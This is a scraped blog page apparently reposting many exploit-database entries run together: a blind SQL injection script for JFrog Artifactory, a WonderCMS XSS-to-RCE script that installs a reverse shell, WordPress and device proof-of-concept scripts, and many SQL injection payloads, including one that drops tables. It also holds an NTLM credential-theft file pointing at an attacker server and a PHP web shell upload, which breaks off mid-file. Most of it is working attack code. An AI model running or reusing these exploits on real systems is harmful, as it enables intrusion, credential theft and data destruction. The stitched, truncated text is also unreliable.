# Exploit Title: artifactory low-privileged blind sql injection
# Google Dork:
# Date:
# Exploit Author: ardr
# Vendor Homepage:https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
# Software Link: https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
# Version: JFrog Artifactory prior to 7.25.4
# Tested on: MySQL
# CVE : CVE-2021-3860
import requests, string, time
from sys import stdout,exit
import warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# written by 75fc58fa86778461771d2ff7f68b28259e97ece9bf6cd8be227c70e6a6140314c97d3fdac30b290c6b10d3679c5ba890635a1ca6fa23c83481dfc1257cd062fd
# old script for CVE-2021-3860
# log into artifactory with any user. there must be populated data in the system. a fresh install will not work.
# you will need to be able to capture a valid request to the below endpoint in order to run this script.
# once captured, replace the cookies and headers below
warnings.simplefilter('ignore',InsecureRequestWarning)
session = requests.session()
base = input("Please enter the base url: ")
url = f"{base}/ui/api/v1/global-search/bundles/received?$no_spinner=true"
# headers = Replace this with captured headers from the above endpoint
pos = 1
# cookies = Replace this with captured cookies from the above endpoint
while True:
for i in string.digits + '.':
data={"after": "", "before": "", "direction": "asc", "name": "*", "num_of_rows": 100, "order_by": f"(select*from(select((CASE WHEN (MID(VERSION(),{pos},1) = '{i}') THEN SLEEP(5) ELSE 4616 END)))a)"}
start = time.time()
r = session.post(url, headers=headers, cookies=cookies, json=data, verify=False)
request_time = time.time() - start
if request_time > 5:
version += i
pos += 1
stdout.write(i)
stdout.flush()
break
if len(version) >= 6:
stdout.write("\n")
print(f"Version found: MySQL {version}")
exit(0)
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863109180
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Author: prodigiousMind
# Exploit: Wondercms 4.3.2 XSS to RCE
import sys
import requests
import os
import bs4
if (len(sys.argv)<4): print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252")
else:
data = '''
var url = "'''+str(sys.argv[1])+'''";
if (url.endsWith("/")) {
url = url.slice(0, -1);
}
var urlWithoutLog = url.split("/").slice(0, -1).join("/");
var urlWithoutLogBase = new URL(urlWithoutLog).pathname;
var token = document.querySelectorAll('[name="token"]')[0].value;
var urlRev = urlWithoutLogBase+"/?installModule=https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip&directoryName=violet&type=themes&token=" + token;
var xhr3 = new XMLHttpRequest();
xhr3.withCredentials = true;
xhr3.open("GET", urlRev);
xhr3.send();
xhr3.onload = function() {
if (xhr3.status == 200) {
var xhr4 = new XMLHttpRequest();
xhr4.withCredentials = true;
xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php");
xhr4.send();
xhr4.onload = function() {
if (xhr4.status == 200) {
var ip = "'''+str(sys.argv[2])+'''";
var port = "'''+str(sys.argv[3])+'''";
var xhr5 = new XMLHttpRequest();
xhr5.withCredentials = true;
xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);
xhr5.send();
}
};
}
};
'''
try:
open("xss.js","w").write(data)
print("[+] xss.js is created")
print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3]))
print("----------------------------\n")
XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\""
XSSlink = XSSlink.strip(" ")
print("send the below link to admin:\n\n----------------------------\n"+XSSlink)
print("----------------------------\n")
print("\nstarting HTTP server to allow the access to xss.js")
os.system("python3 -m http.server\n")
except: print(data,"\n","//write this to a file")
# Exploit Title: Simple Inventory Management System v1.0 - 'email' SQL Injection
# Google Dork: N/A
# Application: Simple Inventory Management System
# Date: 26.02.2024
# Bugs: SQL Injection
# Exploit Author: SoSPiro
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15419/simple-inventory-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 64 bit Wampserver
# CVE : N/A
## Vulnerability Description:
This code snippet is potentially vulnerable to SQL Injection. User inputs ($_POST['email'] and $_POST['pwd']) are directly incorporated into the SQL query without proper validation or sanitization, exposing the application to the risk of manipulation by malicious users. This could allow attackers to inject SQL code through specially crafted input.
## Proof of Concept (PoC):
An example attacker could input the following values:
email: test@gmail.com'%2b(select*from(select(sleep(20)))a)%2b'
pwd: test
This would result in the following SQL query:
SELECT * FROM users WHERE email = 'test@gmail.com'+(select*from(select(sleep(20)))a)+'' AND password = 'anything'
This attack would retrieve all users, making the login process always successful.
request-response foto:https://i.imgur.com/slkzYJt.png
## Vulnerable code section:
====================================================
ims/login.php
<?php
ob_start();
session_start();
include('inc/header.php');
$loginError = '';
if (!empty($_POST['email']) && !empty($_POST['pwd'])) {
include 'Inventory.php';
$inventory = new Inventory();
// Vulnerable code
$login = $inventory->login($_POST['email'], $_POST['pwd']);
//
if(!empty($login)) {
$_SESSION['userid'] = $login[0]['userid'];
$_SESSION['name'] = $login[0]['name'];
header("Location:index.php");
} else {
$loginError = "Invalid email or password!";
}
}
?>
## Reproduce: https://packetstormsecurity.com/files/177294/Simple-Inventory-Management-System-1.0-SQL-Injection.html
# Exploit Title: WEBIGniter v28.7.23 Stored Cross Site Scripting (XSS)
# Exploit Author: Sagar Banwa
# Date: 19/10/2023
# Vendor: https://webigniter.net/
# Software: https://webigniter.net/demo
# Reference: https://portswigger.net/web-security/cross-site-scripting
# Tested on: Windows 10/Kali Linux
# CVE : CVE-2023-46391
Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.
Steps-To-Reproduce:
1. Login to the Account
2. Go to the Categories.
3. Now add catagory > Name section use payload : "><script>alert(1)</script> and choose layoutfile as cat.php
Request
POST /cms/categories/add HTTP/2
Host: demo.webigniter.net
Cookie: ci_session=iq8k2mjlp2dg4pqa42m3v3dn2d4lmtjb; hash=6ROmvkMoHKviB4zypWJXmjIv6vhTQlFw6bdHlRjX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Origin: https://demo.webigniter.net
Referer: https://demo.webigniter.net/cms/categories/add
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
name=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&slug=scriptalert1script&layout_file=cat.php
# Exploit Title: POC-CVE-2023-3244
# Date: 9/12/2023
# Exploit Author: Diaa Hanna
# Software Link: [download link if available]
# Version: <= 1.2.0 comments-like-dislike
# Tested on: 1.1.6 comments-like-dislike
# CVE : CVE-2023-3244
#References
#https://nvd.nist.gov/vuln/detail/CVE-2023-3244
#The Comments Like Dislike plugin for WordPress has been found to have a vulnerability that allows unauthorized modification of data. This vulnerability arises due to a missing capability check on the restore_settings function, which is called through an AJAX action. The vulnerability affects versions up to and including 1.2.0 of the plugin.
#This security flaw enables authenticated attackers with minimal permissions, such as subscribers, to reset the plugin's settings. It's important to note that this issue was only partially patched in version 1.2.0, as the nonce (a security measure) is still accessible to subscriber-level users.
#For more detailed information about this bug, you can refer to the National Vulnerability Database (NVD) website at [CVE-2023-3244](https://nvd.nist.gov/vuln/detail/CVE-2023-3244).
import requests
import argparse
import sys
from colorama import Fore
parser = argparse.ArgumentParser(prog='POC-CVE-2023-3244',description='This is a proof of concept for the CVE-2023-3244 it is an access control vulnerability in the restore_settings function ')
parser.add_argument('-u','--username',help='username of a user on wordpress with low privileges',required=True)
parser.add_argument('-p',"--password",help='password of a user on wordpress with low privileges',required=True)
parser.add_argument('--url',help='the url of the vulnerable server (with http or https)',required=True)
parser.add_argument('--nossl',help='disable ssl verification',action='store_true',required=False,default=False)
args=parser.parse_args()
#check if the domain ends with a '/' if not then add it
url=args.url
if url[-1] != '/':
url+='/'
wp_login = f'{url}wp-login.php'
wp_admin = f'{url}wp-admin/'
username = args.username
password = args.password
session=requests.Session()
#logging in
session.post(wp_login, headers={'Cookie':'wordpress_test_cookie=WP Cookie check'}, data={'log':username, 'pwd':password, 'wp-submit':'Log In',
'redirect_to':wp_admin, 'testcookie':'1' },verify=not (args.nossl))
#if failed to login
if len(session.cookies.get_dict()) == 2:
print(Fore.RED +"Error Logging In Check Your Username and Password And Try Again")
sys.exit(1)
#making the ajax request to wp_ajax_cld_settings_restore_action this line will call the restore_settings function
#the restore_settings function does not check the sufficient privileges of a logged-in user
#even a subscriber can use this POC
response=session.get(f"{wp_admin}/admin-ajax.php?action=cld_settings_restore_action",verify=not (args.nossl))
if response.text == "Settings restored successfully.Redirecting...":
print(Fore.GREEN +"exploited excuted successfully")
print(Fore.YELLOW+ "settings of the comments-like-dislike plugin should be defaulted on the server")
sys.exit(0)
else:
print(Fore.RED + "some error occurred please read the source code of the poc it isn't that long anyway")
sys.exit(1)
# Exploit Title: Online Shopping System Advanced
# Date: 07.12.2023
# Exploit Author: Furkan Gedik
# Vendor Homepage: https://github.com/PuneethReddyHC/online-shopping-system-advanced
# Software Link: https://github.com/PuneethReddyHC/online-shopping-system-advanced
# Version: 1.0
# Tested on: [Kali Linux 2020.3]
# Description
Unauthorized access to a database by injecting malicious SQL statements. The SQL injection vulnerability occurs due to the inclusion of the user-provided "cm" parameter in the SQL query without proper filtering or sanitization. An attacker can exploit the vulnerability by injecting malicious SQL code in the "cm" parameter. Successful exploitation of the vulnerability results in the disclosure of sensitive information from the database, such as user credentials, which can be used to gain unauthorized access to the database.
# PoC
[+] sqlmap output
sqlmap.py -u "http://localhost/online-shopping-system-advanced/payment_success.php?st=Completed&cm=1" -p cm --dbms=mysql -technique=T --proxy=http://127.0.0.1:8080
Parameter: cm (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: st=Completed&cm=1' AND (SELECT 1415 FROM (SELECT(SLEEP(5)))NRHH) AND 'jLpV'='jLpV
# Vulnerability
https://github.com/PuneethReddyHC/online-shopping-system-advanced/blob/master/payment_success.php#L12-L22
[+] payment_success.php
if (isset($_GET["st"])) {
# code...
$trx_id = $_GET["tx"];
$p_st = $_GET["st"];
$amt = $_GET["amt"];
$cc = $_GET["cc"];
$cm_user_id = $_GET["cm"];
$c_amt = $_COOKIE["ta"];
if ($p_st == "Completed") {
include_once("db.php");
$sql = "SELECT p_id,qty FROM cart WHERE user_id = '$cm_user_id'";
# Exploit Title: taskhub 2.8.7 - SQL Injection
# Exploit Author: CraCkEr
# Date: 05/09/2023
# Vendor: Infinitie Technologies
# Vendor Homepage: https://www.infinitietech.com/
# Software Link: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874
# Demo: https://taskhub.company/auth
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4987
# CWE: CWE-89 - CWE-74 - CWE-707
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.
Path: /home/get_tasks_list
GET parameter 'project' is vulnerable to SQL Injection
GET parameter 'status' is vulnerable to SQL Injection
GET parameter 'user_id' is vulnerable to SQL Injection
GET parameter 'sort' is vulnerable to SQL Injection
GET parameter 'search' is vulnerable to SQL Injection
https://taskhub.company/home/get_tasks_list?project=[SQLi]&status=[SQLi]&from=&to=&workspace_id=1&user_id=[SQLi]&is_admin=&limit=10&sort=[SQLi]&order=&offset=0&search=[SQLi]
---
Parameter: project (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=
Parameter: status (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project=&status='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=
Parameter: user_id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project=&status=&from=&to=&workspace_id=1&user_id=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&is_admin=&limit=10&sort=id&order=desc&offset=0&search=
Parameter: sort (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&order=desc&offset=0&search=
Parameter: search (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=') AND (SELECT(0)FROM(SELECT(SLEEP(7)))a)-- wXyW
---
[-] Done
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_ACCOUNT_ENUMERATION_CVE-2024-25734.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.wyrestorm.com
[Product]
APOLLO VX20 < 1.3.58
[Vulnerability Type]
Account Enumeration
[CVE Reference]
CVE-2024-25734
[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. The TELNET service prompts for a password only after a valid username is entered.
Attackers who can reach the Apollo VX20 Telnet service can determine valid accounts, this can potentially allow for brute force attack on a valid account.
[Exploit/POC]
TELNET x.x.x.x 23
username:aa
username:bb
username:admin
password:
[Network Access]
Remote
[Affected Product Code Base]
APOLLO VX20 - < 1.3.58, fixed in v1.3.58
[Severity]
Medium
[Disclosure Timeline]
Vendor Notification: January 18, 2024
Vendor released fixed firmware v1.3.58: February 2, 2024
February 11, 2024 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
# Exploit Title: FAQ Management System v1.0 - 'faq' SQL Injection
# Google Dork: N/A
# Application: FAQ Management System
# Date: 25.02.2024
# Bugs: SQL Injection
# Exploit Author: SoSPiro
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/17175/faq-management-system-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Windows 10 64 bit Wampserver
# CVE : N/A
## Vulnerability Description:
The provided code is vulnerable to SQL injection. The vulnerability arises from directly using user input ($_GET['faq']) in the SQL query without proper validation or sanitization. An attacker can manipulate the 'faq' parameter to inject malicious SQL code, leading to unintended and potentially harmful database operations.
## Proof of Concept (PoC):
An attacker can manipulate the 'faq' parameter to perform SQL injection. For example:
1. Original Request:
http://example.com/endpoint/delete-faq.php?faq=123
2.Malicious Request (SQL Injection):
http://example.com/endpoint/delete-faq.php?faq=123'; DROP TABLE tbl_faq; --
This would result in a query like:
DELETE FROM tbl_faq WHERE tbl_faq_id = '123'; DROP TABLE tbl_faq; --
Which can lead to the deletion of data or even the entire table.
poc foto: https://i.imgur.com/1IENYFg.png
## Vulnerable code section:
====================================================
endpoint/delete-faq.php
$faq = $_GET['faq'];
// ...
$query = "DELETE FROM tbl_faq WHERE tbl_faq_id = '$faq'";
# Exploit Title: Flashcard Quiz App v1.0 - 'card' SQL Injection
# Google Dork: N/A
# Application: Flashcard Quiz App
# Date: 25.02.2024
# Bugs: SQL Injection
# Exploit Author: SoSPiro
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/17160/flashcard-quiz-app-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Windows 10 64 bit Wampserver
# CVE : N/A
## Vulnerability Description:
The provided PHP code is vulnerable to SQL injection. SQL injection occurs when user inputs are directly concatenated into SQL queries without proper sanitization, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.
## Proof of Concept (PoC):
This vulnerability involves injecting malicious SQL code into the 'card' parameter in the URL.
1. Original Code:
$card = $_GET['card'];
$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";
2. Payload:
' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --
3. Injected Query:
DELETE FROM tbl_card WHERE tbl_card_id = '' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --
Request Response foto: https://i.imgur.com/5IXvpiZ.png
## Vulnerable code section:
====================================================
endpoint/delete-flashcard.php
$card = $_GET['card'];
$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_DOS_CVE-2024-25736.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.wyrestorm.com
[Product]
APOLLO VX20 < 1.3.58
[Vulnerability Type]
Incorrect Access Control (DOS)
[Affected Product Code Base]
APOLLO VX20 < 1.3.58, fixed in v1.3.58
[Affected Component]
Web interface, reboot and reset commands
[CVE Reference]
CVE-2024-25736
[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can restart the device via a /device/reboot HTTP GET request.
[Exploit/POC]
curl -k https://192.168.x.x/device/reboot
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: January 18, 2024
Vendor released fixed firmware v1.3.58: February 2, 2024
February 11, 2024 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.wyrestorm.com
[Product]
APOLLO VX20 < 1.3.58
[Vulnerability Type]
Incorrect Access Control (Credentials Disclosure)
[Affected Component]
Web interface, config
[Affected Product Code Base]
APOLLO VX20 < 1.3.58, fixed in v1.3.58
[CVE Reference]
CVE-2024-25735
[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58.
Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.
The credentials are then returned in the HTTP response. curl -k https://192.168.x.x/device/config
E.g. HTTP response snippet:
:{"enable":"y","oncmd":"8004","offcmd":"8036"}},"screen":"dual","ipconflict":"y","wifi":{"auto":"y","band":"5","channel":"153"}
,"softAp":{"password":"12345678","router":"y","softAp":"y"}...
[Exploit/POC]
import requests
target="https://x.x.x.x"
res = requests.get(target+"/device/config", verify=False)
idx=res.content.find('{"password":')
if idx != -1:
idx2=res.content.find('router')
if idx2 != -1:
print("[+] CVE-2024-25735 Credentials Disclosure")
print("[+] " + res.content[idx + 1:idx2 + 11])
print("[+] hyp3rlinx")
else:
print("[!] Apollo vX20 Device not vulnerable...")
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: January 18, 2024
Vendor released fixed firmware v1.3.58: February 2, 2024
February 11, 2024 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/IBMI_ACCESS_CLIENT_REMOTE_CREDENTIAL_THEFT_CVE-2024-22318.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.ibm.com
[Product]
IBM i Access Client Solutions
[Versions]
All
[Remediation/Fixes]
None
[Vulnerability Type]
Remote Credential Theft
[CVE Reference]
CVE-2024-22318
[Security Issue]
IBM i Access Client Solutions (ACS) is vulnerable to remote credential theft when NT LAN Manager (NTLM) is enabled on Windows workstations.
Attackers can create UNC capable paths within ACS 5250 display terminal configuration ".HOD" or ".WS" files to point to a hostile server.
If NTLM is enabled and the user opens an attacker supplied file the Windows operating system will try to authenticate using the current user's session.
The attacker controlled server could then capture the NTLM hash information to obtain the user's credentials.
[References]
https://www.ibm.com/support/pages/node/7116091
[Exploit/POC]
The client access .HOD File vulnerable parameters:
1) screenHistoryArchiveLocation=\\ATTACKER-SERVER\RemoteCredTheftP0c
[KeyRemapFile]
2) Filename= \\ATTACKER-SERVER\RemoteCredTheftP0c
Next, Kali Linux Responder.py to capture: Responder.py -I eth0 -A -vv
The client access legacy .WS File vulnerable parameters:
DefaultKeyboard= \\ATTACKER-SERVER\RemoteCredTheftP0c
Example, client access older .WS file
[Profile]
ID=WS
Version=9
[Telnet5250]
AssociatedPrinterStartMinimized=N
AssociatedPrinterTimeout=0
SSLClientAuthentication=Y
HostName=PWN
AssociatedPrinterClose=N
Security=CA400
CertSelection=AUTOSELECT
AutoReconnect=Y
[KeepAlive]
KeepAliveTimeOut=0
[Keyboard]
IBMDefaultKeyboard=N
DefaultKeyboard=\\ATTACKER-SERVER\RemoteCredTheftP0c
[Communication]
Link=telnet5250
[Network Access]
Remote
[Severity]
Medium
[Disclosure Timeline]
Vendor Notification: December 14, 2023
Vendor Addresses Issue: February 7, 2024
February 8, 2024 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
## Title: dawa-pharma-1.0-2022 Multiple-SQLi
## Author: nu11secur1ty
## Date: 10/12/2023
## Vendor: https://www.mayurik.com/
## Software: https://www.mayurik.com/source-code/P0349/best-pharmacy-billing-software-free-download
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The email parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\\lhc'))+'
was submitted in the email parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed. The attacker can get all the information for the clients
of this application from the server, and very sensitive information
for accessing the server by exploiting the vulnerability.
[+]Payload:
```MySQL
---
Parameter: email (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: email=-8698' OR 5305=5305-- vvuH&password=mayurik&login=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=mayuri.infospace@gmail.com'+(select
load_file('\\\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\\lhc'))+''
AND (SELECT 4515 FROM (SELECT(SLEEP(15)))KUth)--
VRdC&password=mayurik&login=
---
```
## Reproduce:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/dawa-pharma-1.0-2022
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
home page: https://www.nu11secur1ty.com/
# Exploit Title: Moodle 4.3 'id' Insecure Direct Object Reference (IDOR)
# Date: 20/10/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://moodle.org/
# Software Demo: https://school.moodledemo.net/
# Version: 4.3+
# Tested on: Linux
Vulnerability Details
======================
Steps :
1. Log in to the application with the given credentials > USER: teacher PASS: moodle
2. In profile.php?id=11, modify the id Parameter to View User details,
Email address, Country, City/town, City, Timezone
3. Change the existing "id" value to another number
https://school.moodledemo.net/user/profile.php?id=4
https://school.moodledemo.net/user/profile.php?id=5
https://school.moodledemo.net/user/profile.php?id=10
https://school.moodledemo.net/user/profile.php?id=50
https://school.moodledemo.net/blog/index.php?userid=3
https://school.moodledemo.net/blog/index.php?userid=14
https://school.moodledemo.net/mod/forum/user.php?id=53
https://school.moodledemo.net/mod/forum/user.php?id=50
# Exploit Title: Zoo Management System 1.0 - Unauthenticated RCE
# Date: 16.10.2023
# Exploit Author: Çağatay Ceyhan
# Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html#google_vignette
# Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database
# Version: 1.0
# Tested on: Windows 11
## Unauthenticated users can access /zoomanagementsystem/admin/public_html/save_animal address and they can upload malicious php file instead of animal picture image without any authentication.
POST /zoomanagementsystem/admin/public_html/save_animal HTTP/1.1
Host: localhost
Content-Length: 6162
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8NY8zT5dXIloiUML
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/zoomanagementsystem/admin/public_html/save_animal
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="animal_id"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_given_name"
kdkd
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_species_name"
ıdsıd
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_dob"
1552-02-05
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_gender"
m
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_avg_lifespan"
3
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="class_id"
2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="location_id"
2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_dietary_req"
2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_natural_habitat"
faad
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_pop_dist"
eterter
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_joindate"
5559-02-06
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_height"
2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_weight"
3
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_description"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="images[]"; filename="ultra.php"
Content-Type: application/octet-stream
<?php
if (!empty($_POST['cmd'])) {
$cmd = shell_exec($_POST['cmd']);
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Web Shell</title>
<style>
* {
-webkit-box-sizing: border-box;
box-sizing: border-box;
}
body {
font-family: sans-serif;
color: rgba(0, 0, 0, .75);
}
main {
margin: auto;
